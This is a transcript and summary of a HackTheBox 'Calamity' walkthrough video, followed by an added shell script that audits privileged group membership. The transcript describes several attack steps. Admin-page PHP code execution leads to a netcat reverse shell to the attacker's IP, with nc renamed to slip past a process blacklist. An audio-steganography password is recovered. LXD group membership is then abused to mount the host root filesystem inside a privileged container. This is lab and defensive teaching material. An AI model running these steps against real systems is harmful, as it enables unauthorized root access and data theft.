HackTheBox - Calamity
Blog Post: https://reboare.github.io/lxd/lxd-escape.html
01:28 - Begin of recon
02:20 - GoBuster
03:30 - admin.php discovered, finding the pw
04:50 - Getting Code Execution
07:45 - Finding out why Reverse Shells weren't working
09:45 - Getting a reverse shell by renaming nc
11:30 - Transferring files via nc
14:00 - Opening the wav file
16:25 - Using audiodiff to identify differences in sound
17:05 - The next step, why is the same song there twice?
19:25 - Importing files into Audacity and Inverting
22:25 - Attempting to exploit the process blacklist
24:25 - Unintended root LXC Background
28:30 - Creating an Alpine LXC
30:40 - Importing the image into lxc
32:00 - Creating the container
32:40 - Adding the host drive to container
34:20 - Starting the container and entering it
35:05 - Examining the Process Blacklist script
35:54 - Running through the exploit again on an Ubuntu Host
What You'll Learn
The video walks step by step through the Calamity box: directory enumeration with GoBuster, PHP code execution and a reverse shell with Netcat, an audio steganography step to recover a user password, and an unintended root via membership in the lxd group. It also covers web exploitation, reverse shells, and container virtualization.
Full Transcript
What's going on YouTube, this is IppSec, and it is that time: Calamity is retired. Soon you'll know how to get root on Calamity, but it's not the route you are looking for. Unfortunately I don't have enough time right now to properly step through the binary on Calamity; instead you're gonna get an unintended privesc that the user Reboare has been using on several of the Hack The Box machines. I'm assuming if they were unintended on our machines it probably will be in other boot-to-roots as well, as well as useful on pentest engagements. If you want to know more about that, a link is in the description to his blog, or you can stay tuned and watch the video. The TL;DR is that Linux containers can provide root access if users are a member of the lxd user group, so definitely check that. Once knowing the method, all we had to do was check the output of LinEnum.sh or linuxprivchecker.py to see if boxes were vulnerable. It is that obvious, because again it's just who is a member of a user group, which makes it even cooler that we only know of one person that has exploited a box this way, and how many hours have been spent doing it the hard way is probably an unfathomable number, because the binary on Calamity is tough. Anyways, let's jump in and get to that privesc that I know you all want.

Before we do anything we have to nmap the box, so we'll do that with nmap -sC for default scripts, -sV to enumerate versions, -oA for output all formats, call the file calamity, and then the IP address of Calamity, which is 10.10.10.27. It takes some time to run so I've already ran it. Looking at the output we do have SSH and HTTP listening. Can't do much with SSH, so let us look at HTTP. We can go to the IP address 10.10.10.27 and we get a web page. Sorry about that, for some reason the image wasn't loading, but there we go, the web page is there. We can test a few things right off the bat like /robots.txt and /admin, and look at the source code of the page; nothing there, so let's throw it in GoBuster to try to find information. So we do /opt/gobuster, and we have to do -h. One thing worth noting is GoBuster just updated, 1.4 is the newest version, I'm on 1.3 still, but if you use GoBuster be sure to update. So looking at the usage of GoBuster, we will want to do a -w for the wordlist, and that's going to be /usr/share/wordlists/dirbuster/directory-list-2.3-medium, it's the one I normally use; -x for the file extensions we want to search, we'll do php, html; and then let's see, -u for the URL, http://10.10.10.27; -t for threads, we'll do 25 threads. So right off the bat we have a few folders: /uploads and /admin.php. So let's check it out. Uploads is blank, and we have admin.php which is a user login form, so we'll just do admin/admin, gets a failure. If we look at the source code we do see something odd: we have a scrollbar, and if we scroll all the way to the right, it's stupid I know, but we have a password, skoupidotenekes. So I don't even know what this is, so let's do that in Google Translate. If it's stupid I know I'm gonna laugh. Come on, translation... that's a word? No way. Yeah so I don't know what that is, but that is gonna be the password. So if we copy that, the other thing to note: we have password, username, but the field names are name=user, name=pass, so they're reversed. Maybe that was a hint to look at the web page. Put the username and password in, login, and we get to the page.

So we see a lot of talk about... PHP, HTML, harmless. We can write HTML and it parses it, so if we Ctrl+U to view the source we see that HTML. If we do a PHP tag, system, we'll just do ls -la, show me the page, and we get ls output. So easy code execution right there, just execute PHP. So let us do a reverse shell. Oh, and, well first ifconfig to get our IP, and then nc -lvnp 1234; our IP is gonna be 14.23 and that'll be important to remember. Whenever I do reverse shells I just go to the pentestmonkey reverse shell cheat sheet. Come on, this netcat one is really reliable so that's what I'm going to start off with. I'm going to do the PHP one, change your IP, we were 14.21, change to 14.23, copy this, show me the page. Did not work, so let us put that into Burp and do our own encoding on it. So test, edit this, go through the proxy, send to Repeater, paste that in, and we can see this is also messed up. So it's always helpful to be able to look at everything you're typing instead of just a small text box. I forgot the question mark right before the PHP tag, and I need to put system around this because all of that is not raw PHP code, so wrap that in system so it executes that, and now we should be able to encode this. Go, look at that, we have a shell and it just dies. So I'm gonna try that again because at first I was a bit puzzled by this: shell, and it dies. So my thing was, let's see, let's call this shell and we'll create a new tab and we'll call this commands. What I did next was simplify this and verify I could just run system commands, so as a sanity check let's just do an ls plus a semicolon, sleep ten seconds, and we'll do whoami. Click go; this should probably take about ten seconds to run, and my main thing is I'm trying to see if the process actually finishes, because that netcat died almost instantly. And we see the whole thing finished, so we know it's not an issue executing commands. My next thing was I did a find /home to see what files are there, and I could do /etc and other directories as well. Cannot assign address, not available... go, okay that was on, and we get a lot of files. So I'm going to simplify this a little bit and just do -ctime -60, and that's gonna say hey, find me all the files that have been modified within the last 60 minutes in /home, and we only get one file: /home/xalvas/intrusions. So let's look at that file. If we do cat on the file name, we have things saying blacklisted process on netcat, python, sh. So let's change the process so we're no longer netcat. We can just cp /bin/nc /dev/shm/nc, and this is just the RAM disk, it'll go away once it reboots. So if we do that and then go back to our shell... actually no, we have to change the name; we just did nothing there. We'll call it... and then we will also chmod it to be 755. Go back here, where it says netcat we'll do /dev/shm/nc, turn this on, click go. We get a shell and it died because I didn't specify it there; there we go, click go and we get a shell, and it looks like it's no longer dying. Awesome, so we have a more reliable shell on the box.

Python was also one of those blacklisted processes, so I'm not going to improve my TTY because it'll just die. So let's poke around at what we have. We've got /home/xalvas, and going in that we have user.txt, recov.wav; ls on app, can't get in it; ls -la so we can see what's directories and what's not. Let's go into alarmclocks; we've got rick.wav and xouzouris.mp3. I don't know what that is, but let's copy all these files to our box. So let's open up a new pane and do xalvas files. So nc -lvnp, and we'll call this port 88... no, three nines; I don't know why thinking of a port was hard, but it was. And then we'll just send this, what's the rick.wav... go back here, /dev/shm/nc, then we have to go to our IP which is 10.10.14.23 9999, and we're gonna send rick.wav, paste. We got a connect, finished. md5sum rick.wav, md5sum .wav: got the same exact file on both ends. So let us do the next file, which is, I'm gonna try to pronounce that, or type it, where is it, there it is, send that file, and then... 10.10.14.23, and then the last file we had was recov.wav. So we've sent all three of those, and out of habit I gave them mp3 extensions; I'll fix that in a second, I don't know what my mind is today. Okay let's fix this... everybody done that one. What was the last one? Rick, rick is good. Okay, they are all WAV files now, so the only thing left to do is try to open one of the files and see what it is. So open recov.wav, and it didn't open, so I think Totem may be a player, and we don't have any sound. Let's turn this up. So I'm not sure if you heard that; it's hard to share sound between my VM and recording application. I'm sure it's possible, I just don't have time to do it, so I played it really loud hoping my headphones pick it up. If you couldn't tell, that is Rickroll. So the next thing to do is I guess test all the waves, so rick.wav, got it again, and then the last file was that xouzouris one, so let's look at what this is. So we've got three files, we could do exiftool on them to see if there's anything hiding in them. See, nothing there, really nothing there, a comment "isn't this where we came in", but nothing really in any of the files. That EXIF data though is gonna give us a different md5sum, so we don't know if the wav data in recov is the same as in rick. So what I did is I did a pip install audiodiff, and we can pull up the man page here; it's a Python application, audiodiff. And why is that going... quick, come on, load, proxies disabled, what's going on... I guess it's enabled here. I was stupid and was lazy or something; in it, do FoxyProxy, there we go. Anyways, audiodiff, yep, don't want that one, I want Read the Docs. This kind of explains it: you can do pip install, then import, and we have audio_equal. So let's try that. I've already installed it, so just do python, import audiodiff, and then they just did audiodiff.audio_equal, so recov.wav and rick.wav, and we have the actual waves not equal. So this is where it's a little steganography challenge and you have to kind of think like the creator: why would he have two files that are really similar, the same song, but have different waves? Why isn't the Rickroll the same wave on both of these files? And the answer is, well, let's inverse the files. So we'll take the inverse of rick.wav and play it against recov.wav and see if there's anything hidden in the data. If you don't know how wavelengths and sound work, I don't really know either, but if you play the exact inverse of a wave it cancels out and you don't hear anything. So that's how noise-cancelling headphones work: noise-cancelling headphones have a microphone so they can play the inverse of the wave of what's outside the headphone. At least that's how some of them work, and that's why they require batteries.

So the easiest way to do that is through a tool called Audacity. And "failed to open sound device", that's always awesome. File, let's see, it's in Documents, HTB, boxes, calamity. I can't hear anything, well that's not gonna be helpful. Try it again; if at first you don't succeed, try, try and try again. Still nothing. Sound is on and it... I'm going to pause this and we're doing my host machine, that would be easier. Okay, and we're now on my host, so let us import audio. We can import rick.wav, and File, Import, recov.wav. So if we play these files they sound exactly the same, but we can highlight everything and go to Effect, Invert, and that'll invert them... again, that should have inverted against each other. Let's try that again: Effect, Invert, and we get some weird stuff, and once we get near the end we get something else. Come on. So if you remember from the beginning, I can't easily go back to my Kali, but there was an EXIF tag that said something about a loop. So if we play this... so 185, so do 185 and go to the very beginning, which is a good place to start, four... 79, think that's it. I think that'll be the password for Calamity. If you're wondering about my interface, I use i3 personally, so that's how I open that terminal so quick and it split it just like tmux. So copy this and go over into my Kali VM, so there, full screen, and it wasn't as hard to get to Kali as I thought, I don't know what I was thinking, but we can close that. Did copy, so the user was xalvas, so ssh xalvas@10.10.10.27, put the password in, and we get in. So that's how we did that. Beauty. I don't like that sound.

And on this box, my first thing was, I don't want to do this goodluck binary; it's an application, you've got to do multiple flows to get it. So I thought about looking at intrusions, and my first guess was, okay, well if he's just doing like os.kill or doing a pkill syscall on file names, so it was like pkill gibberish, and we can do sleep 5 and we see it execute the sleep 5 command. So if we can get "sleep 5" in here and he's just passing it natively to a syscall, we maybe all get code execution. So that was the very first thing I did. It's not successful, but it's a cool test. So touch, and we'll test "sleep a hundred", and we should do... and see that we look at the file; we didn't want that backslash, so rm nc, go back here, copy this, create that file, and then we'll copy the actual executable nc to that, and then we can chmod it to be 755, and nc -lvnp, listen port... let it get killed, do a ps -ef and grep for sleep, and unfortunately we don't see it, so we didn't have code execution there. We can look at intrusions and see we did pass it, so he has some type of filtering in that script. I actually don't know what it is, I didn't look when I got root the last time, but now it's time to do the unintended route, which we call it lxd containers, LXD, so let's jump in.

Apologies for the choppiness, but I did want to make a quick edit after I watched the video to stress the fact that this may primarily be a boot-to-root type issue and not some crazy security issue, because the use case for this exploit does require the member being a member of sudo or the first user installed with the system, and in production use cases those users are considered admins anyways. In boot-to-root or CTF use cases generally we're lazy and install a system, we get a user with that installed system and try to strip admin, and overlooked one small detail that left an admin privilege on the user. So the boot-to-root CTF use case is much better than in production, but it's gonna look bad. Additionally, if we did things that people should be doing in production and following, like security hardening guidelines when installing things, we would have noticed that the default Ubuntu install creates a user account during install; however, it is recommended that this account should be considered administrator and not assigned to the end user of the device. So again, if we follow that, this is a non-issue, and that's essentially what the GitHub request will be saying, why they closed it, and saying hey, members of this should be considered admin anyways, but in the end should be documented a little bit better. And of course DISA STIG checks should be able to catch things like this, so if you follow proper hardening then hopefully this isn't an issue in production, and this just stresses the fact that you should follow compliance, because in hindsight most things that are major exploits, the impact would have been lessened if you followed some type of compliance. So all that being said, let's jump in and actually see the route.

So it is worth mentioning that this probably affects a lot of other virtualization technologies, so being members of the docker, qemu, kvm, libvirt, whatever groups could be dangerous, and you should look into that as privesc things, because those generally need elevated privileges on the hosts. LXD is just what we're looking at in this video, but I'm sure other things are affected as well, so it's just one of those things sysadmins should be extra careful when doing. Some things back in 2016: we see this issue was reported. These commands are worth noting because they do still work. So essentially it's just saying yeah, it's kind of a requirement for these applications to work, be careful who is in the lxd group, which is a valid response. And then in 2017 another user, I believe this is Reboare, created a request saying hey, there's a privesc if you're a member of the lxd group, and the response is essentially saying yes, at the time of install lxd adds members of the sudo group to the lxd group so they can actually use the LXD application, and it's not really that much of a security risk because if they're in the sudo group they should be allowed to become root anyways. This is a little bit of a misnomer, but again it comes down to, at the time of install it's probably fine for them to have that access because they were root, but when you harden a box things like this can get overlooked just because you don't realize the impact of lxd groups in general. So be careful with that. And then we do have Reboare's blog, which is in the description, that explains how to exploit this.

So let us begin. Create a new shell. The first thing I'm going to do is download lxd-alpine-builder, because, number one, well first of all, what LXD is: it's a Linux container, it's kind of like a VM, it's not full virtualization, it's some virtualization, you can look more into it there. But if we just try to do Ubuntu then the image is going to be really big, so we're gonna create an Alpine Linux image which is really small, it's like a gigabyte versus two megabytes. And number two, Hack The Box doesn't have access to the Internet so we can't pull an Ubuntu image easily. So we're going to git clone the repository and then go in here and just build-alpine, -a for architecture, and we want 32-bit, which either i686 or i386 should work. Start installing it, and once this finishes we should have a tar file. So ls -la, we do, and we're going to scp that to Calamity. So let's cat the Calamity password, get this... I don't know what I just did, I guess resized it, there we go. scp alpine-... 10.10.10.27 and we specify xalvas, paste it, and we can ssh in and just work in this directory so it's a little cleaner, we don't have other files, and we can remove that netcat, so rm /dev/shm/nc. Okay, so the very first thing we have to do is import this image into LXD. So we can do that with lxc image import and specify the name, and I think we do alias with just a space in this command; see if that works, hopefully it does. It'll take about a minute to import this, and essentially what this is doing is just unzipping this and building a machine that is deployable. The next step is gonna be init, which actually creates the machine; this is just creating the machine template. So it looks like that second thing didn't help me at all since it has "error opening", so let's lxc image list, see if it imported. It did not. We'll try --alias alpine, there we go, it imported the image. So lxc image list, we have the image there. So we can do the init to actually create a machine, so lxc init alpine, we'll call this machine privesc, -c security.privileged=true. I don't know exactly what this flag does, but it was said to do it in the GitHub. So we create the machine, so we can just do lxc list to list machines; that is different than lxc image list. So the next thing is to add a hard drive to this. So as said in the GitHub, lxc config device add blah root disk. So what we're going to do is lxc config device add, so the host that we're adding it to is privesc and we're going to call the device host-root, and the next thing will be source=/ path=/mnt/root. So this is telling the VM, hey, mount / into /mnt/root. And I have an error in my config, awesome. Now what did it say, wrong number of subcommand arguments, lxc config device... that's odd. device add privesc host-root, I forgot to say disk. It is hard to type and talk. So, is it right here, disk. So look, we did lxc container, doing the config, adding a device; the container we're adding to is called privesc, the device we want to create is called host-root, the actual type of device is disk, with the source of / and a path of /mnt/root. So if we do lxc exec privesc /bin/sh, oh, we have to start it: lxc start privesc, and then lxc exec privesc then sh, and now we are root, and if we go to /mnt/root we have a filesystem. We can go into root's folder and access root.txt.

Looking at the Python script that we tried to exploit earlier, let's see what didn't work: python, open, netstat, chmod. Oh, he's not using pkill; so I thought he was doing pkill -9 user input, but he is going through netstat, grabbing PIDs of processes and passing the PID, so our user input never makes it into the os.system command. So no privesc there, that's why it didn't work. But one thing I wanted to test real quick is, I don't have LXD installed on my Ubuntu host, and I want to see if it actually adds every user of the sudo group. So we have an Ubuntu host with LXD not installed. What we're going to do is verify that upon install it adds users of the sudo group to the lxd group. So first thing to do is let's be a dumb admin and harden the sudoers file. Now that's the password for my account in this box, I didn't realize it won't even ask me for a password, but anyways let's go to sudoers and remove that. So even though it is a member of the sudo group he can't sudo, because we removed that ability the way we know how; we didn't think to remove the group, we just removed it from the file. So if we do a su now to get back to root, we're there. So let us install lxd, apt install, get some scheduled tasks is running now, let's see, client, there we go, we run the fake race... yeah we won the fake race, but anyways we are now installing lxd, and it should add a user to the lxd user group, and then we're going to try the privesc again. So okay, su -, id, groups, and I am a member of lxd and I can't sudo, but I'm a member of the group so I should be considered as admin on the server. So let us go pull the package, and I just realized I don't have git, so apt install git, yes, and let's see, alpine lxd github... lxd alpine github... maybe, there we go, oh it's the alpine builder. So we can git clone that, cd in there, build-alpine, move this to it. Okay so now let us just rerun what we did. So lxc... remind me later, lxc image import alpine --alias alpine... okay it is imported, so we do lxc image list, we see it's there. So next step is to take the image and create a container, so lxc init alpine and we will call it privesc and add that -c security.privileged=true flag. No storage pool found, so let's run lxd init like it says, leave everything as auto, okay, and go again. So we created the privesc container, so next thing we can do is lxc config device add privesc root disk; was it host-root? We use that just because, it could be anything, but it just makes logical sense to me as the name of that disk; source=/ path=/mnt/root. Okay, it's been added. Now lxc exec on privesc then sh; I forgot to start it again. We are root, if we go to /mnt/root, and yes, we are now root on the host OS. So be careful with installing virtualization technologies just because of what groups they may add you to. It makes sense, because the applications have to do these things; it's just one of those things of admins not fully reading exactly what is intended, and that's why almost every hardening script will say things like make sure users are not members of groups they don't need to be, because of things like this. I don't know what the adm group does, but I'm assuming I want to be a member of it, or the sudo group if I'm not using sudo, and even if I am using sudo I may just hard code my username to have limited sudo privileges. So be careful what groups you make users a member of. But I hope you enjoyed the video, that'll be it, take care.
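As an added defender-side example (not code from the video or from Reboare's post), a POSIX shell audit for the group-membership issue the video ends on: it parses /etc/group-format data for members of lxd, docker, libvirt, kvm and the admin groups, lists accounts that hold a root-equivalent group without also being in sudo or wheel (the removed-sudoers-but-kept-the-group case shown on the Ubuntu host), and, when run with --live on a host that has the lxc client, flags containers that combine security.privileged=true with a disk device whose source is /. The sample group file and its user names are constructed; xalvas is the box's user, and `lxc list`/`lxc config show` are assumed to be the standard LXD client commands.

```shell
#!/bin/sh
# Added example, not from the video or Reboare's blog: audit group membership
# that is effectively root on the host (lxd/docker/libvirt/kvm) or admin
# (sudo/wheel/adm). Default run uses the constructed sample below; pass --live
# to read /etc/group and query the local LXD daemon instead.

PRIV_GROUPS="lxd docker libvirt kvm sudo wheel adm"

# Constructed sample in group(5) format: xalvas is in lxd but NOT in sudo, the
# "admin removed the sudoers entry but forgot the group" scenario.
SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,adminuser
sudo:x:27:adminuser
lxd:x:998:adminuser,xalvas
docker:x:999:
users:x:100:xalvas,guest'

# audit_groups: read group(5) lines from stdin, emit "group:user" for every
# supplementary member of a privileged group, sorted so output is stable.
audit_groups() {
    while IFS=: read -r name _pw _gid members; do
        case " $PRIV_GROUPS " in
            *" $name "*) ;;
            *) continue ;;
        esac
        [ -n "$members" ] || continue
        printf '%s\n' "$members" | tr ',' '\n' | while read -r u; do
            [ -n "$u" ] && printf '%s:%s\n' "$name" "$u"
        done
    done | LC_ALL=C sort
}

# root_without_sudo: from audit_groups output on stdin, list users who hold a
# root-equivalent group (lxd/docker/libvirt/kvm) but are not in sudo or wheel.
# These are the accounts a hardening pass most often misses.
root_without_sudo() {
    awk -F: '
        $1 == "sudo" || $1 == "wheel" { admin[$2] = 1; next }
        $1 == "lxd" || $1 == "docker" || $1 == "libvirt" || $1 == "kvm" { cand[$2] = 1 }
        END { for (u in cand) if (!(u in admin)) print u }
    ' | LC_ALL=C sort
}

# audit_lxd_containers: if the lxc client is present, flag containers that are
# privileged AND mount the host root as a disk device, the escape combination.
audit_lxd_containers() {
    command -v lxc >/dev/null 2>&1 || { echo "lxc client not installed"; return 0; }
    lxc list -c n --format csv 2>/dev/null | while read -r c; do
        cfg=$(lxc config show "$c" 2>/dev/null) || continue
        printf '%s\n' "$cfg" | grep -q 'security.privileged: "true"' || continue
        printf '%s\n' "$cfg" | grep -q '^ *source: /$' || continue
        printf 'PRIVILEGED + HOST ROOT MOUNTED: %s\n' "$c"
    done
}

main() {
    if [ "${1:-}" = "--live" ]; then
        report=$(audit_groups < /etc/group)
    else
        report=$(printf '%s\n' "$SAMPLE_GROUP" | audit_groups)
    fi
    echo "## members of privileged groups"
    printf '%s\n' "$report"
    echo "## root-equivalent group without sudo/wheel"
    printf '%s\n' "$report" | root_without_sudo
    if [ "${1:-}" = "--live" ]; then
        audit_lxd_containers
    fi
    return 0
}

main "$@"
```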